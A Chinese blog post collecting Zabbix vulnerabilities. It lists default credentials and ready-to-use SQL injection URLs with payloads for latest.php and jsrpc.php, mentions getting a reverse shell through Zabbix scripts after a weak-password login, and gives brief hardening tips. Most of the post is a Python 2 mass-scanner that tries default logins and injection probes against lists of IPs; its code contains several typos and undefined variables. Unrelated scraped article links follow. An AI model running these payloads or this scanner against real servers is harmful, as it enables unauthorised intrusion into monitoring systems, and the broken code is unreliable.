Zabbix漏洞汇总
一、zabbix:
zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
二、Zabbix漏洞:
1、弱口令:
WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2、SQL注入
(1)
标题:latest.php处toogle_ids[]参数SQL注入
攻击条件:登陆后
危害:可获取系统权限
URL以及payload:
"""
http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""
(2)
标题:jsrpc.php处profileIdx2参数SQL注入
攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换
危害:一般SQL注入危害
URL以及payload:
"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""
(3)
标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入
攻击条件:不详
危害:不详
URL以及payload:一般SQL注入payload尝试
3、OS命令注入执行:
(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等
(2)防御:
#不要设置AllowRoot=1,避免agent和server以root权限启动。
#进制agent执行system.run,不要设置EnableRemoteCommands=1。
#即使打补丁。
4、自己写的一个python检查脚本:有问题及时喷我
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
""" # import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser #global varites define
ZabbixTarget = None#target ip address!
ZabbixFile = None#target ip address file
BlackList = [
'incorrect',
'<!-- Login Form -->'
] #global config set
logging.basicConfig(level=logging.INFO,format='%(message)s') #global function defines:
def Config_Init():
"""
Take "http://" to the ip address to create targeturl!
"""
global ZabbixTarget
global ZabbixFile
if ZabbixTarget != None:
target = "http://%s"%ZabbixTarget
return [target]
elif ZabbixFile != None:
targetlist = []
with open(ZabbixFile,"r") as fr:
for ip in fr.readlines():
ip = ip.split("\n")[0].split("\r")[0]
target = "http://%s"%str(ip)
targetlist.append(target)
return targetlist
else:
return [] def get_post_data(page_content):
"""
from response html get post data!
"""
postdata = {}
soup = BeautifulSoup(page_content, "html.parser")
for inputparameter in soup.find_all('input'):
if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
postdata[inputparameter['name']] = inputparameter['value']
return postdata def report_file_allinone():
vulnlist = []
scantime = str(datetime.datetime.now())
for parents,dirs,filenames in os.walk("./"):
for filename in filenames:
if filename.find("zabbix_vulnscan_result") >= 0:
with open(filename,"r") as fr:
vulnlist.extend(fr.readlines())
os.remove(filename)
with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw:
fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
for line in vulnlist:
fw.write(line) #Zabbix Scan Class Defines
class ZabbixScan:
def __init__(self,targetlist):
"""
#class column init!
VulnExpPHPFile:
//0-login-weakpassword
//1-httpmon.php parameter->applicationos
//2-chart_bar.php parameter->itemid
//3-jsrpc.php parameter->profileIdx2
//4-latest.php parameter->toggle_ids[]
//5-OS_Injection->When you login the system you can run you scripts!
TestTarget:
//0-login-weakpassword
//1-jsrpc.php
//2-latest.php
"""
self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary!
self._targetlist = targetlist #wait for scan target!
self._size = len(self._targetlist)#size of scan target!
self._sqlinjectionurl1_vulnlist = []
self._sqlinjectionurl2_vulnlist = []
self._login_weakpassword_vulnlist = []
self._login_weakpassword_safelist = [] def __del__(self):
del self._weakpassword
del self._targetlist
del self._size
del self._sqlinjectionurl1_vulnlist
del self._sqlinjectionurl2_vulnlist
del self._login_weakpassword_vulnlist
del self._login_weakpassword_safelist def __len__(self):
"""return size of targetlist"""
return self._size def _scan_default_password_login(self):
for authinfo in self._weakpassword:
user = authinfo["username"]
pswd = authinfo["password"]
for target in self._targetlist:
logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo)))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
request = requests.session()
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if response.status_code != 200:
self._login_weakpassword_safelist.append(target)
continue
postdata = get_post_data(response.content)
headers["Referer"]=target
postdata["user"] = user
postdata["password"] = pswd
try:
response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if "chkbxRange.init();" in response.content:
for flagstring in BlackList:
if flagstring in response.content:
self._login_weakpassword_safelist.append(target)
self._login_weakpassword_vulnlist.append((target,user,pswd))
else:
self._login_weakpassword_safelist.append(target)
request.close() def _sqlinjectionurl1_scan(self):
logging.info("[*] latest.php sqlinjection scan!")
for vulntarget in self._login_weakpassword_vulnlist:
target = vulntarget[0]
user = vulntarget[1]
pswd = vulntarget[2]
request = requests.session()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
continue
postdata = get_post_data(response.content)
postdata["user"] = user
postdata["password"] = pswd
headers["Referer"]=target
try:
response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
continue
sessionid = response.cookie.values()[0][-16:]
scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid)
try:
response = request.get(scanurl,timeout=20)
except Exception,ex:
continue
if "SQL syntax" in repsonse:
self._sqlinjectionurl1_vulnlist.append(vulntarget)
else:
request.close() def _sqlinjectionurl2_scan(self):
logging.info("[*] jsrpc.php sqlinjection scan!")
for vulntarget in self._targetlist:
scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(url,headers=headers,timeout=20)
except Exception,ex:
continue
if "ed733b8d10be255eceba344d533586" in response.content:
self._sqlinjectionurl2_vulnlist.append(vulntarget)
else:
pass def scan_run(self):
self._scan_default_password_login()
self._sqlinjectionurl1_scan()
self._sqlinjectionurl2_scan() class scanthread(threading.Thread):
def __init__(self,threadname,targetlist):
threading.Thread.__init__(self,name=threadname)
self.scanner = ZabbixScan(targetlist)
self.name = threadname
self.targetlist = targetlist
def _create_csv(self):
scantime = str(datetime.datetime.now())
with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw:
for vuln in self.scanner._login_weakpassword_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "weakpassword"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "latest.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = target.split("http://")[-1]
vulntype = "jsrpc.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
def run(self):
#logging.info("[*] %s running!"%self.name)
#logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist)))
self.scanner.scan_run()
self._create_csv()
#logging.info("[*] %s finished!"%self.name) if __name__ == "__main__":
logging.info("[+]*****************************************************************[+]")
logging.info("Zabbix Scan Init!")
parser = OptionParser()
parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!")
parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!")
parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!")
(options, args) = parser.parse_args()
parameterchecklist = [options.iptarget,options.iptargetfile]
if parameterchecklist in [[None,None],[None,""],["",None],["",""]]:
logging.error("[-] Target parameters error!")
exit(0)
try:
options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum)
except Exception,ex:
logging.error("[-] Threadnum parameter error!")
exit(0)
[ZabbixTarget,ZabbixFile] = parameterchecklist
logging.info("[+] Scan Config Init!")
targetlist = Config_Init()
targetsize = len(targetlist)
logging.info("[+] Scan Target Number:%s"%str(targetsize))
logging.info("[+] Scan Threads Init")
threadtargetsize = targetsize/options.threadnum
devidestart = 0
devideend = threadtargetsize
threadlist = []
nameflag = 0
while True:
threadname = "scan-thread-%s"%str(nameflag)
nameflag += 1
if devideend < targetsize:
threadtargetlist = targetlist[devidestart:devideend]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
elif devidestart <= targetsize:
threadtargetlist = targetlist[devidestart:]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
else:
break logging.info("[+] Scan Thread Start!")
for thread in threadlist:
thread.start()
time.sleep(2)
logging.info("[+] %s --Start!"%thread.name)
for thread in threadlist:
thread.join()
logging.info("[+] Scan Finished!")
logging.info("[+] Report Creating!")
report_file_allinone()
logging.info("[+] Report Create!")
exit(0)
Zabbix漏洞汇总的更多相关文章
- Zabbix 漏洞分析
之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析. PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点. 0x00 Zabbix简介 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
- zabbix漏洞
1:Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0 ...
- Zabbix漏洞学习
Zabbix介绍 zabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供灵 ...
- Zabbix漏洞利用 CVE-2016-10134
最近也是遇见了Zabbix,所以这里以CVE-2016-10134为例复现一下该漏洞 什么是Zabbix? zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. ...
- zabbix 问题汇总
1.Zabbix agent on Zabbix server is unreachable for 5 minutes 查看日志sudo tailf /var/log/zabbix/zabbix_a ...
- 常见Java库漏洞汇总
1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...
- struts2远程代码执行漏洞汇总整理
一.S2-001 1.漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果. 举个例子,当你提交的登录表单为username=xishir& ...
- android CVE 漏洞汇总
arm exploits 技术教程: Learning Pentesting for Android Devices CVE-2015-1530 ,CVE-2015-1474 两个android整数溢 ...
随机推荐
- MySQL死锁原因分析
行级锁有三种模式: innodb 行级锁 record-level lock大致有三种:record lock, gap lock and Next-KeyLocks. record lock 锁住 ...
- C语言实现商品销售系统
商品销售系统 #include<stdio.h> //头文件 #include<string.h> //头文件 #include<stdlib.h> //头文件 # ...
- css 图片文字对齐
默认情况,是图片置顶对齐,文字置底对齐,所以通常图片高,文字低,不能水平居中对齐 解决办法:在css中设置图片的vertical-align属性, <img src="" s ...
- MongoDB(六):使用C#代码连接并读取MongoDB数据库
在上篇文章中,讲解了MongoDB的基本操作,包括增.删.改.查,但是这些操作都是在命令行模式下进行的,这篇文章中讲解如何使用C#程序连接到MongoDB数据库,并且读取里面的文档. 一.新建项目 新 ...
- Java中Calendar.DAY_OF_WEEK需要减一的原因
http://blog.sina.com.cn/s/blog_45c06e600100pm77.html ——————————————————————————————————————————————— ...
- r函数知识总结
1. rbind(), cbind(): 构造.合并vector 或matrix为一个矩阵:cbind(1, 1:10) ----默认列合并, rbind(1, 1:10) ----行合并(or构造 ...
- r指定位置插入一列数值
y<-1:4 data1 <-data.frame(x1=c(1,3,5,7), x2=c(2,4,6,8),x3=c(11,12,13,14),x4=c(15,16,17,18)) da ...
- [oracle] 如何使用myBatis在数据库中插入数据并返回主键
在MyBatis中,希望在Oracle中插入数据的同时返回主键值,而非插入的条数. ① oracle使用 selectKey. U_USER_INFO_SEQ 是在数据库中定义好的这张表关联的序列se ...
- fbset
fbset用于读取和设置framebuffer的参数. # fbset mode "800x480-112" # D: 64.998 MHz, H: 58.034 kHz, V: ...
- 散货:null 强转 和 iOS null崩溃
问题1 在看 SpringMVC源码剖析(五)-消息转换器HttpMessageConverter 的时候,在 org.springframework.web.servlet.mvc.method ...